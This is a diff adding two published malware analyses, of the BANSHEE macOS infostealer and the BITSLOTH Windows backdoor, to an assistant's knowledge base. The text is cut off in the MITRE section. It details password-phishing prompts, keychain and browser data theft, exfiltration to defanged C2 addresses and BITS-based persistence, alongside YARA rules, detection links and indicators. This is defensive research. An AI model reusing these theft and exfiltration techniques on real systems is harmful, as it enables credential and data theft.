b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/beyond_the_wail.md new file mode 100644 index 0000000000000..748a0c63390d6 --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/beyond_the_wail.md @@ -0,0 +1,187 @@ +--- +title: "Beyond the wail: deconstructing the BANSHEE infostealer" +slug: "beyond-the-wail" +date: "2024-08-15" +description: "The BANSHEE malware is a macOS-based infostealer that targets system information, browser data, and cryptocurrency wallets." +author: + - slug: elastic-security-labs +image: "beyond-the-wail.jpg" +category: + - slug: malware-analysis +tags: + - macos + - infostealer + - BANSHEE +--- + +## Preamble + +In August 2024, a novel macOS malware named "BANSHEE Stealer" emerged, catching the attention of the cybersecurity community. 
Reportedly developed by Russian threat actors, BANSHEE Stealer was introduced on an underground forum and is designed to function across both macOS x86_64 and ARM64 architectures.
+
+This malware presents a severe risk to macOS users, targeting vital system information, browser data, and cryptocurrency wallets.
+
+With a steep monthly subscription price of $3,000, BANSHEE Stealer stands out in the market, particularly compared to known stealers like AgentTesla.
+
+As macOS increasingly becomes a prime target for cybercriminals, BANSHEE Stealer underscores the rising prevalence of macOS-specific malware. This analysis explores the technical details of BANSHEE Stealer, aiming to help the community understand its impact and stay informed about emerging threats.
+
+![Source: https://x.com/privacyis1st/status/1822948909670408573](/assets/images/beyond-the-wail/image2.png "Source: https://x.com/privacyis1st/status/1822948909670408573")
+
+## Key takeaways
+
+* BANSHEE Stealer highlights the growing number of macOS malware samples as the OS becomes a more attractive target for cyber threats.
+* BANSHEE Stealer's $3,000 monthly price is notably high compared to Windows-based stealers.
+* BANSHEE Stealer targets a wide range of browsers, cryptocurrency wallets, and around 100 browser extensions, making it a highly versatile and dangerous threat.
+
+## Malware Analysis
+
+The malware we analyzed in this research retained all of its C++ symbols, which is interesting because it lets us infer the project's code structure from the source code file names, as seen in the picture below. Looking into the C++-generated global variable initialization functions, we can find values set (automatically or manually) by the operator during the build process, such as the remote IP, encryption key, build ID, etc.
+
+![Functions list that initialize the global variables of every source file](/assets/images/beyond-the-wail/image5.png "Functions list that initialize the global variables of every source file")
+
+The following table summarizes the `.cpp` file names leaked through the symbols in the binary.
+
+| File name | Description |
+|----------------|----------------------------------------------------------------------------------------------------------------------|
+| `Controller.cpp` | Manages core execution tasks, including anti-debugging measures, language checks, data collection, and exfiltration. |
+| `Browsers.cpp` | Handles the collection of data from various web browsers. |
+| `System.cpp` | Executes AppleScripts to gather system information and perform password phishing. |
+| `Tools.cpp` | Provides utility functions for encryption, directory creation, compression, etc. |
+| `Wallets.cpp` | Responsible for collecting data from cryptocurrency wallets. |
+
+### Debugger, VM Detection, and Language Checks
+
+![Checking for debugging, Virtualization, and the language of the machine](/assets/images/beyond-the-wail/image8.png "Checking for debugging, Virtualization, and the language of the machine")
+
+BANSHEE Stealer uses basic techniques to evade detection. It detects debugging by utilizing the [sysctl](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/sysctl.3.html) API.
+
+![Debugging detection with sysctl macOS API](/assets/images/beyond-the-wail/image1.png "Debugging detection with sysctl macOS API")
+
+For virtualization detection, it runs the command `system_profiler SPHardwareDataType | grep 'Model Identifier'` to determine whether the string `Virtual` appears in the hardware model identifier, which suggests a virtual machine. These methods are relatively simple and can be easily circumvented by advanced sandboxes and malware analysts.
+
+![Virtual machine check](/assets/images/beyond-the-wail/image7.png "Virtual machine check")
+
+Additionally, it parses the user-preferred canonicalized language returned from the [CFLocaleCopyPreferredLanguages](https://developer.apple.com/documentation/corefoundation/1542887-cflocalecopypreferredlanguages) API and looks for the string `ru`. This tactic helps the malware avoid infecting systems where Russian is the primary language.
+
+### System information collection
+
+#### User password
+
+The malware creates an [Osascript](https://ss64.com/mac/osascript.html) password prompt with a dialog claiming that, in order to launch the application, the system settings need to be updated, and asking the user to enter their password.
+
+When the user enters the password, it will be validated using the [dscl](https://ss64.com/mac/dscl.html) command by running `dscl Local/Default -authonly `
+
+If valid, the password will be written to the following file `/Users//password-entered`.
+
+![User password phishing through a prompt](/assets/images/beyond-the-wail/image3.png "User password phishing through a prompt")
+
+These credentials can be leveraged to decrypt the keychain data stored on the system, granting access to all saved passwords.
+
+#### File, software, and hardware information collection
+
+The function `System::collectSystemInfo` collects system information and serializes it in a JSON object. It executes the command `system_profiler SPSoftwareDataType SPHardwareDataType`, which provides details about the system’s software and hardware. It gets the machine's public IP by requesting it from `freeipapi.com` through the built-in macOS `cURL` command.
+
+The JSON file will be saved under `/system_info.json`.
+
+BANSHEE stealer executes AppleScripts; interestingly, it writes the AppleScripts to the same file `/tmp/tempAppleScript`.
+
+The first script to be executed mutes the system sound with the `osascript -e 'set volume with output muted'` command. It then collects various files from the system, which are listed below:
+
+* Safari cookies
+* Notes database
+* Files with the following extensions: `.txt`, `.docx`, `.rtf`, `.doc`, `.wallet`, `.keys`, or `.key` from the Desktop and Documents folders.
+
+#### Dump keychain passwords
+
+It copies the system keychain `/Library/Keychains/login.keychain-db` to `/Passwords`.
+
+### Browser collection
+
+BANSHEE currently collects data from nine different browsers, including browser history, cookies, and logins:
+
+* Chrome
+* Firefox
+* Brave
+* Edge
+* Vivaldi
+* Yandex
+* Opera
+* OperaGX
+
+Regarding Safari, only the cookies are collected by the AppleScript script for the current version.
+
+![Web browser file collection](/assets/images/beyond-the-wail/image4.png "Web browser file collection")
+
+Additionally, data from approximately 100 browser plugins is collected from the machine. A list of these extension IDs is provided at the end of the blog post.
+
+The collected files are saved under `/Browsers`.
+ +### Wallet collection + +* Exodus +* Electrum +* Coinomi +* Guarda +* Wasabi Wallet +* Atomic +* Ledger + +The collected wallets are stored under `/Wallets`. + +### Exfiltration + +After the malware finishes collecting data, it first ZIP compresses the temporary folder using the `ditto` command. The zip file is then XOR encrypted and base64 encoded and sent through a post request to the URL: `http://45.142.122[.]92/send/` with the built-in cURL command. + +![Xor and base64 encoding of the zip file to be exfiltrated](/assets/images/beyond-the-wail/image6.png "Xor and base64 encoding of the zip file to be exfiltrated") + +## Behavior detection + +* [Crypto Wallet File Access by Unsigned or Untrusted Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/credential_access_crypto_wallet_file_access_by_unsigned_or_untrusted_binary.toml) +* [Web Browser Credential Data Accessed by Unsigned or Untrusted Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/credential_access_web_browser_credential_data_accessed_by_unsigned_or_untrusted_process.toml) +* [Osascript Payload Drop and Execute](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/command_and_control_osascript_payload_drop_and_execute.toml) +* [Potential Credentials Phishing via Osascript](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/credential_access_potential_credentials_phishing_via_osascript.toml) + +## YARA rule + +Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the BANSHEE malware: + +``` +rule Macos_Infostealer_Banshee { + meta: + author = "Elastic Security" + creation_date = "2024-08-13" + last_modified = "2024-08-13" + os = "MacOS" + arch = "x86, arm64" + category_type = "Infostealer" + family = "Banshee" + threat_name = "Macos.Infostealer.Banshee" + license = "Elastic License v2" + + strings: + $str_0 = "No debugging, VM, or Russian language detected." ascii fullword + $str_1 = "Remote IP: " ascii fullword + $str_2 = "Russian language detected!" ascii fullword + $str_3 = " is empty or does not exist, skipping." ascii fullword + $str_4 = "Data posted successfully" ascii fullword + $binary_0 = { 8B 55 BC 0F BE 08 31 D1 88 08 48 8B 45 D8 48 83 C0 01 48 89 45 D8 E9 } + $binary_1 = { 48 83 EC 60 48 89 7D C8 48 89 F8 48 89 45 D0 48 89 7D F8 48 89 75 F0 48 89 55 E8 C6 45 E7 00 } + condition: + all of ($str_*) or all of ($binary_*) +} +``` + +## Conclusion + +BANSHEE Stealer is macOS-based malware that can collect extensive data from the system, browsers, cryptocurrency wallets, and numerous browser extensions. Despite its potentially dangerous capabilities, the malware's lack of sophisticated obfuscation and the presence of debug information make it easier for analysts to dissect and understand. While BANSHEE Stealer is not overly complex in its design, its focus on macOS systems and the breadth of data it collects make it a significant threat that demands attention from the cybersecurity community. + +## Observables + +All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/banshee) in both ECS and STIX format in a combined zip bundle. + +The following observables were discussed in this research. 
+ +| Observable | Type | Name | Reference | +|------------------------------------------------------------------|-----------|-----------------|--------------------| +| 11aa6eeca2547fcf807129787bec0d576de1a29b56945c5a8fb16ed8bf68f782 | SHA-256 | BANSHEE stealer | | +| 45.142.122[.]92 | ipv4-addr | | BANSHEE stealer C2 | \ No newline at end of file diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bits_and_bytes_analyzing_bitsloth.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bits_and_bytes_analyzing_bitsloth.md new file mode 100644 index 0000000000000..a42e72143e83b --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bits_and_bytes_analyzing_bitsloth.md @@ -0,0 +1,433 @@ +--- +title: "BITS and Bytes: Analyzing BITSLOTH, a newly identified backdoor" +slug: "bits-and-bytes-analyzing-bitsloth" +date: "2024-08-01" +description: "Elastic Security Labs identified a novel Windows backdoor leveraging the Background Intelligent Transfer Service (BITS) for C2. This malware was found during a recent activity group tracked as REF8747." +author: + - slug: seth-goodwin + - slug: daniel-stepanic +image: "Security Labs Images 29.jpg" +category: + - slug: malware-analysis +--- + +## BITSLOTH at a glance + +BITSLOTH is a newly discovered Windows backdoor that leverages the Background Intelligent Transfer Service (BITS) as its command-and-control mechanism. BITSLOTH was uncovered during an intrusion within the LATAM region earlier this summer. This malware hasn't been publicly documented to our knowledge and while it’s not clear who’s behind the malware, it has been in development for several years based on tracking distinct versions uploaded to VirusTotal. + +The most current iteration of the backdoor at the time of this publication has 35 handler functions including keylogging and screen capture capabilities. In addition, BITSLOTH contains many different features for discovery, enumeration, and command-line execution. Based on these capabilities, we assess this tool is designed for gathering data from victims. + +### Key takeaways + + - BITSLOTH is a newly discovered Windows backdoor + - BITSLOTH uses a built-in Microsoft feature, Background Intelligent Transfer Service (BITS) for command-and-control communication + - BITSLOTH has numerous command handlers used for discovery/enumeration, execution, and collection purposes + - The backdoor contains logging functions and strings consistent with the authors being native Chinese speakers + +## Discovery + +Our team observed BITSLOTH installed on a server environment on June 25th during REF8747, this was an intrusion into the Foreign Ministry of a South American government. The intrusion was traced back to PSEXEC execution on one of the infected endpoints. The attackers used a slew of publicly available tools for most of their operations with the exception of BITSLOTH. + + - [RINGQ](https://github.com/T4y1oR/RingQ) + - [IOX](https://github.com/EddieIvan01/iox) + - [STOWAWAY](https://github.com/ph4ntonn/Stowaway) + - [GODPOTATO](https://github.com/BeichenDream/GodPotato) + - [NOPAC](https://github.com/Ridter/noPac) + - [MIMIKATZ](https://github.com/gentilkiwi/mimikatz) + - [PPLFAULT](https://github.com/gabriellandau/PPLFault) + - [CERTIFY](https://github.com/GhostPack/Certify) + +One of the primary mechanisms of execution was through a shellcode loading project called RINGQ. 
In a similar fashion to DONUTLOADER, RINGQ converts any Windows executable into custom shellcode and places it into a file (main.txt). This shellcode is decrypted and executed in memory. This technique is used to bypass defenses that rely on hash blocklists or static signatures in some anti-malware products.
+
+![Screenshot of RingQ demo](/assets/images/bits-and-bytes-analyzing-bitsloth/image21.png)
+
+We observed RINGQ being used to load the IOX port forwarder. Note: The key in the image below is the hex conversion of “whoami”.
+
+![RINGQ loading and executing IOX](/assets/images/bits-and-bytes-analyzing-bitsloth/image13.png)
+
+Additionally, the attackers used the STOWAWAY utility to proxy encrypted traffic over HTTP to their C2 servers. Proxy tools, tunnelers, and redirectors are commonly used during intrusions to conceal the adversary behind an intrusion. These tools offer adversaries various features, including the ability to bypass internal network controls, as well as terminal interfaces, encryption, and file transfer options.
+
+![STOWAWAY proxy usage](/assets/images/bits-and-bytes-analyzing-bitsloth/image19.png)
+
+After initial access, the actor moved laterally and dropped BITSLOTH in the form of a DLL (```flengine.dll```) inside the ProgramData directory. The actor then executed the music-making program FL Studio (```fl.exe```). Based on the observed call stack associated with the self-injection alert, we confirmed the threat actor used a traditional side-loading technique using a signed version of [FL Studio](https://www.virustotal.com/gui/file/75747c8b5b3676abde25a8dd66280908c0d0fc57ef054b88a41673619d3bee28/details).
+
+```
+ c:\windows\syswow64\ntdll.dll!0x770841AC
+ c:\windows\syswow64\ntdll.dll!0x7709D287
+ c:\windows\syswow64\kernelbase.dll!0x76ED435F
+ c:\windows\syswow64\kernelbase.dll!0x76ED42EF
+ Unbacked!0x14EAB23
+ Unbacked!0x14EA8B6
+ c:\programdata\pl studio\flengine.dll!0x74AD2F2E
+ c:\programdata\pl studio\fl.exe!0xDB3985
+ c:\programdata\pl studio\fl.exe!0xDB3E5E
+ c:\programdata\pl studio\fl.exe!0xDB4D3F
+ c:\windows\syswow64\kernel32.dll!0x76B267F9
+ c:\windows\syswow64\ntdll.dll!0x77077F4D
+ c:\windows\syswow64\ntdll.dll!0x77077F1B
+```
+
+This call stack was generated along with a process injection alert, and enabled researchers to extract an in-memory DLL that was set with Read/Write/Execute (RWX) page protections.
+
+#### BITSLOTH overview
+
+During our analysis, we found several older BITSLOTH samples demonstrating a record of development since December 2021. Within this project, the malware developer chose notable terminology, referring to BITSLOTH as the ```Slaver``` component and the command-and-control server as the ```Master``` component. Below is an example of one of the PDB file paths linked to BITSLOTH that depicts this:
+
+![PDB linked to BITSLOTH sample](/assets/images/bits-and-bytes-analyzing-bitsloth/image7.png)
+
+BITSLOTH employs no obfuscation around control flow or any kind of string encryption.
+
+![BITSLOTH strings](/assets/images/bits-and-bytes-analyzing-bitsloth/image9.png)
+
+Both older and recent samples contain strings used for logging and debugging purposes. As an example, at startup there is a string referenced in the read-only section (```.rdata```).
+
+![Debugging](/assets/images/bits-and-bytes-analyzing-bitsloth/image24.png)
+
+This Simplified Chinese wide-character string translates to:
+```Note: There is already a program running, do not run it again…```
+
+![String left by developer](/assets/images/bits-and-bytes-analyzing-bitsloth/image29.png)
+
+These small snippets contained within BITSLOTH help shed light on the development and prioritization of features, along with what appear to be operator instructions. In the latest version, a new scheduling component was added by the developer to control specific times when BITSLOTH should operate in a victim environment. This is a feature we have observed in other modern malware families such as [EAGERBEE](https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set).
+
+![BITSLOTH scheduling component](/assets/images/bits-and-bytes-analyzing-bitsloth/image27.png)
+
+## BITSLOTH code analysis
+
+BITSLOTH is a backdoor with many different capabilities including:
+
+ - Running and executing commands
+ - Uploading and downloading files
+ - Performing enumeration and discovery
+ - Collecting sensitive data through keylogging and screen capturing
+
+### Mutex
+
+BITSLOTH uses a hard-coded mutex (```Global\d5ffff77ff77adad657658```) within each sample to ensure only one instance is running at a time.
+
+![Mutex used by BITSLOTH](/assets/images/bits-and-bytes-analyzing-bitsloth/image6.png)
+
+### Communication
+
+BITSLOTH adopts a traditional client/server architecture; the developer refers to the client as the ```Slaver``` component and the command-and-control (C2) server as the ```Master``` component. The developer embeds the IP/port of the C2 server in each sample with a front-loaded string (```rrrr_url```). This string acts as a key for locating the C2 configuration in its own memory while running, and is used when updating the C2 server.
+
+Below are the configurations from several samples our team has observed; the threat actor configures both internal and external IP ranges.
+
+```
+rrrr_url216.238.121[.]132:8443
+rrrr_url192.168.1[.]125:8443
+rrrr_url192.168.1[.]124:8443
+rrrr_url45.116.13[.]178:443
+```
+
+One of the defining features of BITSLOTH is using the [Background Intelligent Transfer Service](https://learn.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal) (BITS) for C2. While this feature was designed to facilitate the network transfer of files between two machines, it has been [abused](https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/) by multiple state-sponsored groups and continues to fly under the radar in many organizations. This medium is appealing to adversaries because many organizations still struggle to monitor BITS network traffic and detect unusual BITS jobs.
+
+> Windows has a system administration feature called Background Intelligent Transfer Service (BITS) enabling the download and upload of files to HTTP web servers or SMB shares. The BITS service employs multiple features during the file transfer process, such as the ability to pause/resume transfers and handle network interruptions. BITS traffic is usually associated with software updates and is therefore often wrongly treated as trusted. Many organizations lack visibility into BITS network traffic, making this an appealing target.
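+
+Before looking at how the BITS jobs themselves are constructed, note that the front-loaded ```rrrr_url``` marker makes the embedded C2 address trivial to recover from a sample or memory capture. The snippet below is a minimal illustration of that idea rather than Elastic's tooling; the marker comes from the samples shown above, while the choice to read up to 64 printable characters after it is an assumption about string length.
+
+```
+import re
+import sys
+
+MARKER = b"rrrr_url"
+
+def extract_c2(path):
+    # Grab the printable run that immediately follows the rrrr_url marker
+    data = open(path, "rb").read()
+    pattern = re.escape(MARKER) + rb"([\x20-\x7e]{1,64})"
+    return [m.group(1).decode() for m in re.finditer(pattern, data)]
+
+if __name__ == "__main__":
+    for sample in sys.argv[1:]:
+        for c2 in extract_c2(sample):
+            print(f"{sample}: {c2}")
+```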
+ +The BITS API is exposed through Window’s [Component Object Model](https://learn.microsoft.com/en-us/windows/win32/com/component-object-model--com--portal) (COM) using the **IBackgroundCopyManager** [interface](https://learn.microsoft.com/en-us/windows/win32/api/bits/nn-bits-ibackgroundcopymanager). This interface provides capabilities to create new jobs, enumerate existing jobs in the transfer queue, and access a specific job from a transfer queue. + +![Initializing IBackgroundCopyManager interface](/assets/images/bits-and-bytes-analyzing-bitsloth/image12.png) + +After initialization, BITSLOTH cancels any existing BITS jobs on the victim machine that match the following display names: + + - ```WU Client Download``` + - ```WU Client Upload``` + - ```WU Client Upload R``` + +These names are used by the developer to blend in and associate the different BITS transfer jobs with their respective BITS [job type](https://learn.microsoft.com/en-us/windows/win32/api/bits/ne-bits-bg_job_type). By canceling any existing jobs, this allows the execution of the malware to operate from a clean state. + +![Switch statement inside BITSLOTH to process BITS job](/assets/images/bits-and-bytes-analyzing-bitsloth/image17.png) + +Below are the Microsoft definitions matching the type of BITS job: + + - **BG_JOB_TYPE_DOWNLOAD** - Specifies that the job downloads files to the client. + - **BG_JOB_TYPE_UPLOAD** - Specifies that the job uploads a file to the server. + - **BG_JOB_TYPE_UPLOAD_REPLY** - Specifies that the job uploads a file to the server, and receives a reply file from the server application. + +After canceling any existing jobs, the MAC address and operating system information are retrieved and placed into global variables. A new thread gets created, configuring the auto-start functionality. Within this thread, a new BITS download job is created with the name (```Microsoft Windows```). + +![BITS job creation for auto-start functionality](/assets/images/bits-and-bytes-analyzing-bitsloth/image18.png) + +This download job sets the destination URL to ```http://updater.microsoft[.]com/index.aspx```. While this domain is not routable, BITSLOTH masquerades this BITS job using a benign looking domain as a cover then uses **SetNotifyCmdLine** to execute the malware when the transfer state is changed. + +![Setting up BITS persistence via SetNotifyCmdLine](/assets/images/bits-and-bytes-analyzing-bitsloth/image28.png) + +Interestingly, this unique toolmark allowed us to pivot to additional samples showing this family has been in circulation for several years. + +![VirusTotal relationships from embedded Microsoft URL](/assets/images/bits-and-bytes-analyzing-bitsloth/image4.png) + +At this point, the malware has now been configured with persistence via a BITS job named ```Microsoft Windows```. Below is a screenshot of this job’s configuration showing the notification command line set to the BITSLOTH location (```C:\ProgramData\Media\setup_wm.exe```) + +![BITSLOTH persistence job](/assets/images/bits-and-bytes-analyzing-bitsloth/image33.png) + +Once BITSLOTH becomes active, it will start requesting instructions from the C2 server using the ```WU Client Download``` job. This request URL is generated by combining the MAC address with a hard-coded string (```wu.htm```). 
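+
+This check-in URL format is easy to reproduce when standing up a test C2 for analysis. The snippet below is a small sketch of the format just described (scheme, C2 address, dash-separated MAC address, and the hard-coded ```wu.htm``` suffix); it is an illustration, not the malware's own formatting routine.
+
+```
+import uuid
+
+def checkin_url(c2, use_https=False):
+    # Format the local MAC address as upper-case, dash-separated octets
+    mac = f"{uuid.getnode():012X}"
+    mac = "-".join(mac[i:i + 2] for i in range(0, 12, 2))
+    scheme = "https" if use_https else "http"
+    return f"{scheme}://{c2}/{mac}/wu.htm"
+
+print(checkin_url("192.168.182.130", use_https=True))
+```
+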
Below is an example URL:
+
+```
+https://192.168.182.130/00-0C-29-0E-29-87/wu.htm
+```
+
+In response to this request, the malware will then receive a 12-byte structure from the C2 server containing a unique ID for the job, a command ID for the handler, and a response token. Throughout these file transfer exchanges, temporary files on the victim machine are used as placeholders to hold the data being transmitted back and forth; BITSLOTH uses filenames starting with the characters (```wm```) followed by random characters.
+
+![Data exchange through temporary files](/assets/images/bits-and-bytes-analyzing-bitsloth/image25.png)
+
+### Command functionality
+
+BITSLOTH uses a command handler with 35 functions to process specific actions that should be taken on the victim machine. The malware has the option to be configured with HTTP or HTTPS and uses a hardcoded single-byte XOR (```0x2```) to obfuscate the incoming instructions from the C2 server. The outbound requests containing the collected victim data have no additional protections applied by the malware itself and are sent in plaintext.
+
+In order to move fast, our team leveraged a helpful Python [implementation](https://github.com/SafeBreach-Labs/SimpleBITSServer) of a BITS server released by [SafeBreach Labs](https://www.safebreach.com/). Setting the C2 IP to our loopback address inside a VM allowed us to get introspection on the network traffic.
+
+![BITSLOTH command handler](/assets/images/bits-and-bytes-analyzing-bitsloth/image2.png)
+
+The handlers all behave in a similar fashion, performing a primary function and then writing the data returned from the handler to a local temporary file. These temporary files then get mapped to a BITS upload job called ```WU Client Upload```. Each handler uses its own string formatting to create a unique destination URL. Each filename at the end of the URL uses a single letter to represent the type of data collected from the host, such as ```P.bin``` for processes or ```S.bin``` for services.
+
+```
+http://192.168.182.130/00-0C-29-0E-29-87/IF/P.bin
+```
+
+Below is an example screenshot showing the process enumeration handler with the string formatting and how this data is then linked to the BITS upload job.
+
+![BITSLOTH handler for running processes](/assets/images/bits-and-bytes-analyzing-bitsloth/image31.png)
+
+This link to the exfiltrated data can also be observed by viewing the BITS upload job directly. In the screenshots below, we can see the destination URL (C2 server) for the upload and the temporary file (```wm9F0C.tmp```) linked to the job.
+
+![BITS upload job configuration](/assets/images/bits-and-bytes-analyzing-bitsloth/image15.png)
+
+If we look at the temporary file, we can see the collected process information from the victim host.
+
+![Contents of temporary file holding exfiltrated data](/assets/images/bits-and-bytes-analyzing-bitsloth/image26.png)
+
+Soon after the upload job is created, the data is sent over the network through a BITS_POST request containing the captured data.
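+
+To tie the tasking format together, the 12-byte structure and single-byte XOR described above can be illustrated with a short sketch. This is a hypothetical decoder written for clarity, not the malware's or Elastic's code; the three fields are assumed to be 32-bit little-endian values in the order listed above (job ID, command ID, response token), which should be verified against a live sample before relying on it.
+
+```
+import struct
+
+XOR_KEY = 0x02  # hard-coded single-byte XOR used on incoming instructions
+
+def decode_tasking(blob):
+    plain = bytes(b ^ XOR_KEY for b in blob)
+    # Assumed layout: three consecutive little-endian DWORDs
+    job_id, command_id, token = struct.unpack("<III", plain[:12])
+    return {"job_id": job_id, "command_id": command_id, "token": token}
+
+# Example: a 12-byte response as it might arrive from a lab C2
+sample = bytes(b ^ XOR_KEY for b in struct.pack("<III", 7, 2, 0xDEADBEEF))
+print(decode_tasking(sample))
+```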
+ +![Outbound BITS_POST request](/assets/images/bits-and-bytes-analyzing-bitsloth/image22.png) + +### Command handling table + +| Command ID | Description | +| ----- | ----- | +| 0 | Collect running processes via **WTSEnumerateProcessesW** | +| 1 | Get Windows services via **EnumServicesStatusW** | +| 2 | Get system information via ```systeminfo``` command | +| 3 | Retrieve all top-level Windows via **EnumWindows** | +| 5 | Collect file listings | +| 6 | Download file from C2 server | +| 7 | Upload file to C2 server | +| 10 | Terminate itself | +| 11 | Set communication mode to HTTPS | +| 12 | Set communication mode to HTTP | +| 13 | Remove persistence | +| 14 | Reconfigure persistence | +| 15 | Cancel BITS download job (```WU Client Download```) | +| 16 | Remove persistence and delete itself | +| 17 | Thread configuration | +| 18 | Duplicate of handler #2 | +| 19 | Delete file based on file path | +| 20 | Delete folder based on file path | +| 21 | Starts terminal shell using stdin/stdout redirection | +| 22 | Resets terminal handler (#21) | +| 23 | Runs Windows tree command | +| 24 | Updates BITSLOTH, delete old version | +| 25 | Shutdown the machine via **ExitWindowsEx** | +| 26 | Reboot the machine via **ExitWindowsEx** | +| 27 | Log user off from the machine via **ExitWindowsEx** | +| 28 | Terminate process based on process identifier (PID) | +| 29 | Retrieves additional information via ```msinfo32``` command | +| 30 | Execute individual file via **ShellExecuteW** | +| 34 | Create new directory via **CreateDirectoryW** | +| 41 | Upload data to C2 server | +| 42 | Checks for capture driver via **capGetDriverDescriptionW** | +| 43 | Take screenshots of victim machine desktop | +| 44 | Record keystrokes from victim machine | +| 45 | Stop recording screenshot images | +| 46 | Stop keylogger functionality | + +### Backdoor functionality + +BITSLOTH includes a wide range of post-compromise capabilities for an adversary to operate within a victim environment. We will focus on the more significant capabilities by grouping them into different categories. + +#### Discovery/enumeration + +A portion of the BITSLOTH handlers are focused on retrieving and enumerating data from victim machines. This includes: + + - Retrieving process information via **WTSEnumerateProcessesW** + - Collecting Windows services via **EnumServicesStatusW** + - Enumerating all top-level Windows via **EnumWindows** with a callback function + - Retrieving system information via windows utilities such as ```systeminfo``` and ```msinfo32``` + +![BITSLOTH handler used to collect system information](/assets/images/bits-and-bytes-analyzing-bitsloth/image14.png) + +In many of the handlers, the locale version is configured to ```chs ```(Chinese - Simplified). + +![Retrieve Windows information](/assets/images/bits-and-bytes-analyzing-bitsloth/image16.png) + +BITSLOTH has a couple custom enumeration functions tied to retrieving file listings and performing directory tree searches. 
The file listing handler takes a custom parameter from the operator to target specific folder locations of interest: + + - **GET_DESKDOP** → **CSIDL_DESKTOPDIRECTORY** (Desktop) + - **GET_BITBUCKET** -> **CSIDL_BITBUCKET** (Recycle Bin) + - **GET_PERSONAl** -> **CSIDL_MYDOCUMENTS** (My Documents) + +![File listing parameters via BITSLOTH](/assets/images/bits-and-bytes-analyzing-bitsloth/image10.png) + +BITSLOTH also has the ability to collect entire directory/file listings on the machine for every file by using the Windows [tree](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/tree) utility. This handler loops across the alphabet for each drive letter where the data is then saved locally in a temporary file named ```aghzyxklg```. + +![Tree listing via BITSLOTH](/assets/images/bits-and-bytes-analyzing-bitsloth/image1.png) + +The tree data is then compressed and sent to the C2 server with a .ZIP extension. Below is an example of the collected data. This data can help pinpoint sensitive files or provide more context about the target environment. + +![Example of data collected through **GetDirectoryTree** handler](/assets/images/bits-and-bytes-analyzing-bitsloth/image5.png) + +#### Collection + +In terms of collection, there are a few handlers used for actively gathering information. These are centered around capturing screenshots from the desktop and performing keylogging functionality. + +BITSLOTH implements a lightweight function used to identify capture recording devices, this appears to be a technique to check for a camera using the Windows API (**capGetDriverDescriptionW**). + +![Handler that records capture devices](/assets/images/bits-and-bytes-analyzing-bitsloth/image30.png) + +BITSLOTH has the ability to take screenshots based on parameters provided by the operator. Input to this function uses a separator (```||```) where the operator provides the number of seconds of the capture interval and the capture count. The images are stored as BMP files with a hard coded name ```ciakfjoab``` and compressed with the DEFLATE algorithm using a ```.ZIP``` archive. These timestamped zipped archives are then sent out to the C2 server. + +The handler leverages common screenshot APIs such as **CreateCompatibleBitmap** and **BitBlt** from ```Gdi32.dll```. + +![BITSLOTH screen capture using Windows APIs](/assets/images/bits-and-bytes-analyzing-bitsloth/image32.png) + +For recording keystrokes, BITSLOTH uses traditional techniques by monitoring key presses using **GetAsyncKeyState**/**GetKeyState**. The handler has an argument for the number of seconds to perform the keylogging. This data is also compressed in a ```.ZIP``` file and sent outbound to the C2 server. 
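+
+Both collection handlers take simple operator-supplied parameters: a ```||``` separated capture interval and count for screenshots, and a duration in seconds for the keylogger. As a small illustration of the screenshot argument format described above (the function and variable names here are ours, not the author's):
+
+```
+def parse_capture_args(arg):
+    # e.g. "5||12" -> capture every 5 seconds, 12 times
+    interval, count = arg.split("||", maxsplit=1)
+    return int(interval), int(count)
+
+print(parse_capture_args("5||12"))
+```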
+
+![Keylogger functionality inside BITSLOTH](/assets/images/bits-and-bytes-analyzing-bitsloth/image8.png)
+
+#### Execution / Maintenance
+
+BITSLOTH has multiple capabilities around maintenance and file execution, as well as standard backdoor functionality such as:
+
+ - Capability to execute files stand-alone via **ShellExecuteW**
+ - Windows terminal capability to execute commands and read data back via pipes
+ - Create directories, perform reboots, shut down the machine, terminate processes
+ - Perform file uploads and downloads to and from the C2 server
+ - Modify BITSLOTH configuration such as communication modes, update the C2 URL, turn off keylogging/screenshot features
+
+![BITSLOTH’s CMD terminal](/assets/images/bits-and-bytes-analyzing-bitsloth/image11.png)
+
+## BITSLOTH pivots
+
+BITSLOTH appears to be actively deployed. We identified another BITSLOTH C2 server (```15.235.132[.]67```) using the same port (```8443```) with the same [SSL certificate](https://www.shodan.io/search?query=ssl.cert.serial%3A253c1c0bbf58e1f509fc4468de462ed8872f81d9) seen in our intrusion.
+
+![Shodan SSL certificate matches](/assets/images/bits-and-bytes-analyzing-bitsloth/image20.png)
+
+While it’s not exactly clear who’s behind BITSLOTH, there was a large amount of VirusTotal upload activity on December 12, 2021. With around 67 uploads over 24 hours from one submitter (```1fcc35ea```), we suspect someone linked to this project was validating detections, making modifications, and uploading different versions of BITSLOTH to VirusTotal. One sample was packed with VMProtect, others were stripped of functionality, and some uploads were debug builds.
+
+![BITSLOTH - VirusTotal Submitter (```1fcc35ea```)](/assets/images/bits-and-bytes-analyzing-bitsloth/image23.png)
+
+A lot of time has passed since then, but it is interesting to see this family show up in a recent intrusion. Whatever the objective behind this malware, it's surprising that this family remained under the radar for so many years.
+
+![Different PDB paths from BITSLOTH uploads](/assets/images/bits-and-bytes-analyzing-bitsloth/image3.png)
+
+### REF 8747 through MITRE ATT&CK
+
+Elastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+#### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
